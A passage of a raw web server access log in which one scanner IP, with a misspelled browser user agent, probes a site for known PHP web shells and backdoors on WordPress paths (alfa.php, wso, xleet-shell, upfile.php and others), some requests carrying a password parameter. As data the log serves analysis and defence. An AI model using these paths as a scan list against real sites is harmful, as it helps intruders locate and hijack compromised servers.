/wp-content/themes/mero-magazine/ws.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:25 -0400] "GET /wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 301 285 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:25 -0400] "GET /wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 301 288 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:25 -0400] "GET /wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:26 -0400] "GET /blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 HTTP/1.1" 301 290 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:26 -0400] "GET /wp-content/themes/astra/mar.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:26 -0400] "GET /wp-content/plugins/simple-google-recaptcha/recaptcha.php HTTP/1.1" 301 287 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:27 -0400] "GET /wp-includes/SimplePie/IRI-stream.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:27 -0400] "GET /woh.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:28 -0400] "GET /edit.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:28 -0400] "GET /pi.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:28 -0400] "GET /include.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:29 -0400] "GET /cjfuns.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:29 -0400] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:29 -0400] "GET /wp-content/plugins/db-toolkit/dbtoolkit_import.php HTTP/1.1" 301 281 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:30 -0400] "GET /.well-known/fierzashell.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:30 -0400] "GET /.well-known/worm0.PhP7 HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:30 -0400] "GET /.tmb/worm0.PhP7 HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:05:23:31 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:05:23:31 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:05:23:31 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 128.199.106.124 - - [12/Aug/2025:05:23:31 -0400] "GET /.well-known/acme-challenge/iR7SzrsOUEP.php HTTP/1.1" 301 273 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 146.190.190.67 - - [12/Aug/2025:05:23:31 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 128.199.106.124 - - [12/Aug/2025:05:23:31 -0400] "GET /wp-admin/js/widgets/users.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:31 -0400] "GET /xleet-shell.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:32 -0400] "GET /wp-admin/maint/iR7SzrsOUEP.php HTTP/1.1" 301 261 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:32 -0400] "GET /wp-admin/network/iR7SzrsOUEP.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:32 -0400] "GET /wp-admin/user/iR7SzrsOUEP.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:33 -0400] "GET /cgi-bin/iR7SzrsOUEP.php HTTP/1.1" 301 254 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:33 -0400] "GET /wp-includes/block-supports/themes.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:33 -0400] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 257 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:34 -0400] "GET /cgi-bin/themes.php HTTP/1.1" 301 249 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:34 -0400] "GET /wp-includes/pomo/themes.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:34 -0400] "GET /gelay.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:35 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:35 -0400] "GET /al.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:35 -0400] "GET /wso112233.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:36 -0400] "GET /adminfuns.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:36 -0400] "GET /edit.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:36 -0400] "GET /thoms.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:37 -0400] "GET /menu-header.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:37 -0400] "GET /schallfuns.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:37 -0400] "GET /color.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:38 -0400] "GET /gecko.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:38 -0400] "GET /about.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:38 -0400] "GET /install.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:39 -0400] "GET /wp1010.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:39 -0400] "GET /becks.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:40 -0400] "GET /g.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:40 -0400] "GET /wp-admin/css/colors/blue/atomlib.php HTTP/1.1" 301 267 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:40 -0400] "GET /wp-admin/network/upfile.php HTTP/1.1" 301 258 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:41 -0400] "GET /wp-admin/.well-known/upfile.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:41 -0400] "GET /wp-content/plugins/wordpresss3cll/wp-login.php HTTP/1.1" 301 277 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:41 -0400] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 301 265 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:42 -0400] "GET /wp-content/plugins/wordpresss3cll/includes.php HTTP/1.1" 301 277 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:42 -0400] "GET /owl.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:42 -0400] "GET /xxl.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:43 -0400] "GET /xl2023.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:43 -0400] "GET /.well-known/pki-validation/iR7SzrsOUEP.php HTTP/1.1" 404 - "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:43 -0400] "GET /css/iR7SzrsOUEP.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:43 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 253 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:44 -0400] "GET /wp-content/index.php HTTP/1.1" 301 251 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:44 -0400] "GET /gawean.PhP7 HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:44 -0400] "GET /wp-themes.php7 HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:45 -0400] "GET /wong.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:45 -0400] "GET /css/index.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:46 -0400] "GET /x.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:46 -0400] "GET /wp-content/plugins/envato-market/inc/class-envato-market-api.php HTTP/1.1" 301 295 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:46 -0400] "GET /wp-content/uploads/up.php HTTP/1.1" 301 256 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:46 -0400] "GET /.well-known/acme-challenge/upfile.php HTTP/1.1" 301 268 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:47 -0400] "GET /ALFA_DATA/alfacgiapi/upfile.php HTTP/1.1" 301 262 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:47 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php?p= HTTP/1.1" 301 286 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:48 -0400] "GET /smtp.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:48 -0400] "GET /wp-hoard.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:48 -0400] "GET /.tmb/users.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:49 -0400] "GET /ALFA_DATA/alfacgiapi/menu.php HTTP/1.1" 301 260 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:50 -0400] "GET /wsa.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:50 -0400] "GET /wp-seo.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:50 -0400] "GET /cong.php?p= HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:51 -0400] "GET /ioxi-rex.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:51 -0400] "GET /.well-known/warm.PhP7 HTTP/1.1" 301 252 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:51 -0400] "GET /.tmb/warm.PhP7 HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:52 -0400] "GET /alfa.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:52 -0400] "GET /plugin.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:52 -0400] "GET /alfa2.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:53 -0400] "GET /alfa-priv.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:53 -0400] "GET /wp-content/alfa.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:54 -0400] "GET /wp-admin/alfa.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:54 -0400] "GET /wp-include/alfa.php HTTP/1.1" 301 250 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:54 -0400] "GET /st.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 128.199.106.124 - - [12/Aug/2025:05:23:55 -0400] "GET /f77.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 